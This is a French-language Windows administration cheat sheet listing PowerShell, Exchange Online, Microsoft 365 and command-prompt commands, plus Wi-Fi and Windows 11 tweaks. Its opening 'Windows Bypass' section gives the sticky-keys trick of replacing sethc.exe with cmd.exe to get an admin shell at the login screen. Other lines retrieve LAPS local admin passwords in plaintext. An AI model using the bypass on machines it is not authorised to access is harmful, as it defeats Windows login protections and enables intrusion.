Ce document fournit une liste de commandes utiles qui peuvent être exécutées via PowerShell.
# **Windows Bypass tuto**
Outils nécessaires :
Clé USB avec install de windows
Etapes 1 : démarrer sur l’install et via l’invite de commande :
copy d:\windows\system32\sethc.exe d:\
copy /y d:\windows\system32\cmd.exe d:\windows\system32\sethc.exe
Redémarrage du poste
Appuyer plusieurs fois sur shift et vous aurez une invite cmd en Admin.
# Problème wifi Windows 10
Ipconfig /release
Ipconfig /flushdns
Gestion alimentation : décocher "autoriser l'ordinateur à éteindre ce périphérique"
Panneau de configuration/système/matériel/gestionnaire de périphériques/carte réseau sans fil/propriété/avancé/mode sans fil : 802.11B/G
## Liste des commandes Powershell
- **Get-Process:** Cette commande récupère une liste de tous les processus en cours d'exécution sur le système.
- **Get-Service:** Cette commande récupère une liste de tous les services en cours d'exécution sur le système.
- **Get-EventLog:** Cette commande récupère une liste de tous les journaux d'événements sur le système.
- **Get-HotFix:** Cette commande récupère une liste de toutes les mises à jour installées sur le système.
- **Get-WindowsUpdateLog:** Cette commande récupère une liste de toutes les mises à jour de Windows installées sur le système.
- **Get-NetAdapter:** Cette commande récupère une liste de tous les adaptateurs réseau sur le système.
- **Get-NetConnectionProfile:** Cette commande récupère une liste de tous les profils de connexion réseau sur le système.
- **Get-NetIPAddress:** Cette commande récupère une liste de toutes les adresses IP sur le système.
- **Get-NetTCPConnection:** Cette commande récupère une liste de toutes les connexions TCP sur le système.
- ******************************************Get-LapsADPassword -Identity “DeviceName” -DomainController “DomainName” -AsPlainText :****************************************** Permet de voir le MDP d’un compte Admin Local d’un domain (LAPS)
- **Connect-ExchangeOnline:** Cette commande permet de se connecter à Exchange Online.
- **Get-Mailbox:** Cette commande permet de récupérer des informations sur les boîtes aux lettres.
- **Set-Mailbox:** Cette commande permet de modifier les propriétés d'une boîte aux lettres.
- **Get-DistributionGroup:** Cette commande permet de récupérer des informations sur les groupes de distribution.
- **Set-DistributionGroup:** Cette commande permet de modifier les propriétés d'un groupe de distribution.
- **Get-Team:** Cette commande permet de récupérer des informations sur les équipes Microsoft Teams.
- **Set-Team:** Cette commande permet de modifier les propriétés d'une équipe Microsoft Teams.
- **Get**-**LapsADPassword -Identity “laptop” -DomainController “XXXX” -AsPlainText: permet de voir le mot de passe Laps d’une machine**
Des commandes PowerShell supplémentaires pour gérer des objets dans le cloud Microsoft 365 comprennent :
- **Get-MsolUser:** Cette commande permet de récupérer la liste de tous les utilisateurs de votre tenant Microsoft 365 et leurs propriétés.
- **Set-MsolUser:** Cette commande vous permet de modifier les propriétés d'un utilisateur dans votre tenant Microsoft 365.
- **Get-MsolGroup:** Cette commande permet de récupérer la liste de tous les groupes de votre tenant Microsoft 365 et leurs propriétés.
- **Set-MsolGroup:** Cette commande vous permet de modifier les propriétés d'un groupe dans votre tenant Microsoft 365.
- **Get-MsolRole:** Cette commande permet de récupérer la liste de tous les rôles de votre tenant Microsoft 365 et leurs propriétés.
- **Set-MsolRole:** Cette commande vous permet de modifier les propriétés d'un rôle dans votre tenant Microsoft 365.
- **Get-MsolServicePrincipal:** Cette commande permet de récupérer la liste de tous les principaux de service de votre tenant Microsoft 365 et leurs propriétés.
- **Set-MsolServicePrincipal:** Cette commande vous permet de modifier les propriétés d'un principal de service dans votre tenant Microsoft 365.
Notez que certaines de ces commandes nécessitent l'installation du module PowerShell Azure Active Directory.
## Liste des commandes Invite de Commande
Voici une autre liste de commandes utiles avec l'invite de commande pour un administrateur système :
- **assoc** : Affiche ou modifie les associations de fichiers.
- **cipher** : Affiche ou modifie le chiffrement des fichiers sur un lecteur.
- **compact** : Affiche ou modifie la compression des fichiers sur un lecteur.
- **driverquery** : Affiche la liste des pilotes installés sur le système.
- **find** : Recherche une chaîne de caractères dans un fichier ou un ensemble de fichiers.
- **forfiles** : Exécute une commande sur un ensemble de fichiers sélectionnés.
- **fsutil** : Affiche ou modifie diverses propriétés de système de fichiers.
- **icacls** : Affiche ou modifie les listes de contrôle d'accès pour les fichiers et les répertoires.
- **netstat** : Affiche les connexions réseau actives et les ports ouverts.
- **pathping** : Affiche les temps de réponse et les sauts de réseau pour atteindre une adresse IP spécifiée.
- **reg** : Affiche, ajoute, modifie ou supprime des clés et des valeurs de la base de registre.
- **sc** : Gère les services du système.
- **schtasks** : Planifie l'exécution d'une commande ou d'un script à une heure spécifiée.
- **systeminfo** : Affiche les informations système et de configuration.
- **takeown** : Prend possession d'un fichier ou d'un répertoire.
- **wmic** : Affiche ou modifie diverses propriétés système.
Voici une liste supplémentaire de commandes utiles avec l'invite de commande pour un administrateur système :
- **bcdedit** : Configure le magasin de données de configuration de démarrage (BCD) pour les démarrages de système d'exploitation.
- **bootcfg** : Modifie la configuration de démarrage pour les systèmes d'exploitation qui se chargent à partir de fichiers .ini.
- **cacls** : Affiche ou modifie les listes de contrôle d'accès pour les fichiers et les répertoires.
- **chkntfs** : Affiche ou modifie la vérification du disque au démarrage.
- **diskcomp** : Compare le contenu de deux disquettes.
- **diskcopy** : Copie le contenu d'une disquette sur une autre.
- **diskperf** : Active ou désactive la collecte de données de performances disque.
- **fltmc** : Gère les filtres de système de fichiers.
- **format** : Formate un disque dur ou une disquette.
- **fsutil** : Affiche ou modifie diverses propriétés de système de fichiers.
- **help** : Affiche des informations d'aide sur les commandes Windows.
- **hostname** : Affiche le nom de l'ordinateur local ou le nom de l'hôte distant.
- **logman** : Crée et gère les sessions et les tâches de collecte de données de performance et d'événements.
- **net** : Gère les utilisateurs, les groupes, les ordinateurs et les ressources partagées du réseau.
- **netsh** : Configure les paramètres de protocole réseau.
- **openfiles** : Affiche et ferme les fichiers ouverts par les utilisateurs du réseau.
- **query** : Affiche des informations sur les objets système.
- **quser** : Affiche des informations sur les utilisateurs connectés à un système distant.
- **qwinsta** : Affiche les informations sur les sessions de terminal ouvertes sur un système distant.
- **recover** : Récupère les informations lisibles sur un disque endommagé.
- **robocopy** : Copie des fichiers et des répertoires avec de nombreuses options avancées.
- **schtasks** : Planifie l'exécution d'une commande ou d'un script à une heure spécifiée.
- **subst** : Crée un lecteur virtuel pour un chemin d'accès de chemin d'accès.
- **tasklist** : Affiche une liste des processus en cours d'exécution sur le système.
- **taskkill** : Permet de terminer un processus en cours d'exécution.
- **title** : Définit le titre de la fenêtre de la console.
- **ver** : Affiche la version de Windows.
- **vol** : Affiche le nom et le numéro de série du volume.
Restore OLD Menu Windows 11 :
reg.exe add "HKCU\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32" /f /ve
Restart explorer
